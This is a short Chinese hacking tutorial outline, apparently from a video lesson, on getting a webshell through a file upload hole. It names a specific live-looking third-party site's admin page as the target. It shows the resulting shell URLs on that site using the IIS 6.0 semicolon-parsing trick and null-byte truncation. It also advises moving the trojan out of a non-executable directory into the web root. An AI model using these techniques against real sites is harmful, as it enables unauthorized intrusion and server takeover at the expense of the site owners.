╭──────────────────────────╮
  猫客工作室--真诚、高效、创新，敢想敢做努力做到最好！ 
╰──────────────────────────╯

>讲师名称：剑眉大侠（QQ767501681）

>动画名称：上传漏洞之burpsuite改包拿shell



目标站：http://www.szhrkk.com/manage/login.asp

name=”filepath” （文件路径）
name=”filename”  （文件名）


①利用iis6.0解析格式拿shell

http://www.szhrkk.com/UploadFiles/Product/jian.asp;20142212031892122.jpg



②利用00截断拿shell

空格=20

小数点=00

http://www.szhrkk.com/UploadFiles/Product/jian.asp

http://www.szhrkk.com/jian.asp


PS：
如果文件路径那里存在一个bs目录，请一定要去掉，因为这个目录在服务器上默认设置是无法执行脚本文件的，我们把木马放在这个目录下肯定运行不了，自然拿不到shell，所以一定去去掉，对于目录问题，这个我们可以随意修改的，可以直接不要目录也行，直接把木马写到根目录！